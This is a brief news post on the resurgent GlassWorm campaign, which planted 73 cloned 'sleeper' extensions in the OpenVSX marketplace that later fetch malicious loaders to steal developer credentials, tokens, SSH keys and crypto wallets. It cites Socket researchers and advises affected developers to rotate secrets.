The GlassWorm campaign has resurfaced, targeting the OpenVSX ecosystem with 73 "sleeper" extensions. These extensions are initially benign but transform into malicious loaders via updates, delivering payloads at a later stage. Six have already activated, with the rest considered dormant or suspicious. This marks an evolution in the supply chain attack, moving from embedding malicious code directly to using thin loaders that fetch secondary VSIX packages, platform-specific compiled modules, or obfuscated JavaScript at runtime.
Previously, GlassWorm attacks were known for stealing cryptocurrency wallets, developer credentials, access tokens, and SSH keys. Researchers from Socket have identified these new extensions as clones of legitimate listings, designed to trick developers. They recommend that anyone who installed these extensions rotate all secrets and clean their development environment to mitigate potential compromise.
Top comments (0)